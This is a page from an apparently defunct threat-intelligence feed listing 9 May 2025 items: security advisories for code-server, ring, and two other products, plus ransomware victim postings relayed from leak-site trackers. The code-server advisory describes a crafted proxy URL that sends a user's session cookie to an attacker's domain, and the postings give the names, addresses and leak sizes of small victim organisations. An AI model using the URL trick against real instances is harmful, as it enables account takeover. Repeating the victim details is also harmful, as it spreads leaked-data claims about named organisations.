CyberAlerts is shutting down on June 30th, 2025. Thank you for your support!

Threat and Vulnerability Intelligence Database

RSS Feed

Example Searches:

CVE
Threat Actors
Countries
Vendors
Severity
Known Exploited
Ransomware Attack Update for the 9th of May 2025
Description: Ransomware Attack Update for the 9th of May 2025
Source: DarkWebInformer
May 9th, 2025 (about 2 months ago)
Rapid7 Launches Managed Detection & Response (MDR) for Enterprise
Source: Dark Reading
May 9th, 2025 (about 2 months ago)
[code-server] code-server's session cookie can be extracted by having user visit specially crafted proxy URL
Description: Summary A maliciously crafted URL using the proxy subpath can result in the attacker gaining access to the session token. Details Failure to properly validate the port for a proxy request can result in proxying to an arbitrary domain. The malicious URL https:///proxy/[email protected]/path would be proxied to [email protected]/path where the attacker could exfiltrate a user's session token. Impact Any user who runs code-server with the built-in proxy enabled and clicks on maliciously crafted links that go to their code-server instances with reference to /proxy. Normally this is used to proxy local ports, however the URL can reference the attacker's domain instead, and the connection is then proxied to that domain, which will include sending cookies. With access to the session cookie, the attacker can then log into code-server and have full access to the machine hosting code-server as the user running code-server. Patches Patched versions are from v4.99.4 onward. References https://github.com/coder/code-server/security/advisories/GHSA-p483-wpfp-42cj https://github.com/coder/code-server/commit/47d6d3ada5aadef6d221f3d612401eb3dad9299e https://github.com/coder/code-server/releases/tag/v4.99.4 https://github.com/advisories/GHSA-p483-wpfp-42cj
Source: Github Advisory Database (NPM)
May 9th, 2025 (about 2 months ago)
[ring] ring has some AES functions that may panic when overflow checking is enabled in
Description: A flaw was found in Rust's Ring package. A panic may be triggered when overflow checking is enabled. In the QUIC protocol, this flaw allows an attacker to induce this panic by sending a specially crafted packet. It will likely occur unintentionally in 1 out of every 2**32 packets sent or received. References https://nvd.nist.gov/vuln/detail/CVE-2025-4432 https://github.com/briansmith/ring/pull/2447 https://github.com/briansmith/ring/commit/ec2d3cf1d91f148c84e4806b4f0b3c98f6df3b38 https://access.redhat.com/security/cve/CVE-2025-4432 https://bugzilla.redhat.com/show_bug.cgi?id=2350655 https://github.com/briansmith/ring https://github.com/briansmith/ring/blob/main/RELEASES.md#version-01712-2025-03-05 https://rustsec.org/advisories/RUSTSEC-2025-0009.html https://github.com/advisories/GHSA-c86p-w88r-qvqr

EPSS Score: 0.13%

Source: Github Advisory Database (Rust)
May 9th, 2025 (about 2 months ago)

CVE-2024-24142
Sourcecodester School Task Manager 1.0 allows SQL Injection via the 'subject' parameter.
Description: Sourcecodester School Task Manager 1.0 allows SQL Injection via the 'subject' parameter.

EPSS Score: 7.28%

SSVC Exploitation: poc

Source: CVE
May 9th, 2025 (about 2 months ago)

CVE-2024-23746
Miro Desktop 0.8.18 on macOS allows local Electron code injection via a complex series of steps that might be usable in some environments (bypass a...
Description: Miro Desktop 0.8.18 on macOS allows local Electron code injection via a complex series of steps that might be usable in some environments (bypass a kTCCServiceSystemPolicyAppBundles requirement via a file copy, an app.app/Contents rename, an asar modification, and a rename back to app.app/Contents).

EPSS Score: 0.35%

SSVC Exploitation: poc

Source: CVE
May 9th, 2025 (about 2 months ago)
LockBit Ransomware Gang Hacked, Operations Data Leaked
Description: Exposed data from LockBit's affiliate panel includes Bitcoin addresses, private chats with victim organizations, and user information such as credentials.
Source: Dark Reading
May 9th, 2025 (about 2 months ago)
🏴‍☠️ Medusa has just published a new victim : Russell Child Development Center
Description: Russell Child Development Center is a community-based non-profit organization that serves early childhood programs across 19 counties in Southwest Kansas. The center offers a variety of services including early intervention, targeted case management, and support programs for families and child care providers. Russell Child Development Center corporate office is located in 2735 N Jennie Barker Rd, Garden City, Kansas, 67846, United States and has 30 employees. The total amount of data leakage is 215.50 GB
Source: Ransomware.live
May 9th, 2025 (about 2 months ago)
🏴‍☠️ Medusa has just published a new victim : Lake Shore Paving
Description: Lake Shore Paving (founded in 1998) - services for excavation, utility, asphalt paving and concrete paving needs. Lake Shore Paving corporate office is located in 7 Osmer St, Jamestown, New York, 14701, United States and has 19 employees. The total amount of data leakage is 112.30 GB
Source: Ransomware.live
May 9th, 2025 (about 2 months ago)
🏴‍☠️ Clop has just published a new victim : CHECKCITY.COM
Description: [AI generated] CheckCity.com is a financial services company based in Provo, Utah. It offers a variety of services, including payday loans, cash advances, title loans, and check cashing. It also provides money orders, wire transfers, tax services, and prepaid debit cards. Founded in 1986, CheckCity operates both online and through physical branches. It serves clients across multiple states in the US.
Source: Ransomware.live
May 9th, 2025 (about 2 months ago)